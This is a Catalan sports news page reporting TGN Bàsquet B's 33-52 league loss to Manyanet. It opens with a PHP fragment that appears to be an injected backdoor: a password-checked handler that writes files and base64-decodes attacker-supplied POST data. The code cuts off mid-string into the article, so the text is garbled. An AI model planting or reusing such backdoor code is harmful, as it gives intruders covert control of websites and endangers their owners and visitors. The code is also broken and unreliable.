function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" El TGN Bàsquet B, superat en tot moment pel Manyanet, perd el primer matx de lliga (33-52) - Tgn Bàsquet Club -

El TGN Bàsquet B, superat en tot moment pel Manyanet, perd el primer matx de lliga (33-52)

Updated: setembre 26, 2015

Mal debut del TGN Bàsquet B en el curs 2015/2016 a Primera Catalana. L’equip que entrena Sergi Farré va topar contra un rival que el va dominar des de l’inici i va anar a remolc sense possibilitats de capgirar la dinàmica. El mal inici de partit de les locals (0-12 a 3:50 del final del primer quart) va ser clau per entendre el que va passar durant el matx. El Manyanet va agafar confiança amb aquesta diferència i la seva confiança en atac no va parar de crèixer. El TGN Bàsquet B, en canvi, es va anar ofuscant a mesura que passaven els minuts. Sense les idees clares en atac, fallant nombrosos tirs exteriors i amb moltes pèrdues de pilota, el ritme i el marcador eren de les visitants (11-22, 15′). Només la presència de Pocino al pal baix va igualar una mica les forces i va obrir una escletxa d’esperança per l’equip lila (15-28 al descans).

En el tercer quart, però, les diferències no es van escurçar, ans al contrari. Les locals continuaven topant contra la defensa rival que, a més aprofitava el domini en el rebot per sortir ràpid al contraatac (15-37 a 2:26 del final del tercer quart, màxim desavantatge del TGN Bàsquet B en tot el matx). Tot semblava perdut fins que un canvi defensiu de Farré en l’últim quart va obrir una porta a l’esperança. La defensa en zona de les locals va provocar el col·lapse en l’atac del Manyanet que no va trobar la fluïdesa ofensiva que havia exhibit fins aleshores. Els tirs oberts no entraven i sota el cèrcol, Pocino i Yasmina feien valer la seva força. Així, el Manyanet es va veure forçat a demanar un temps mort quan el marcador mostrava un 31-43 a falta de 4:31 pel final. La remuntada local, però, no es va culminar per les nombroses pèrdues de pilota i el mal balanç defensiu. El Manyanet va trobar una altra vegada la zona de comfort i va vèncer amb claredat.